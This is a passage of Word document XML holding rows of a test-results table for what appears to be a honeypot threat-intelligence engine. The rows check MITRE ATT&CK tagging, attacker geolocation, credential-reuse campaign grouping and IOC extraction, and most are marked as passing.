            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">VIDEO_STREAM_ACCESS, MULTI_PROTOCOL_ATTACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">VIDEO_STREAM_ACCESS MEDIUM; MULTI_PROTOCOL_ATTACK CRITICAL (5 protocols, 3 devices)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify every detection carries MITRE ATT&amp;CK techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/mitre/summary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique IDs on every detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">26 techniques reported, e.g. T1078.001, T0812, T1110, T0855</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify attackers are correlated and geolocated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/sessions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">One row per IP with GeoIP, protocols and threat score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">6 attackers; demo cities (Tehran, Shanghai, Frankfurt, Moscow, Ashburn); threat CRITICAL 100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify credential-reuse campaigns are grouped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/campaigns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">IPs with Jaccard ≥ 0.6 grouped</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">CMP-A22751E9: 6 IPs sharing 17 identical credential pairs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-DET-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Intel Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify IOCs are extracted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Detections stored</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/iocs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Download URL, payload host and attacker IPs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
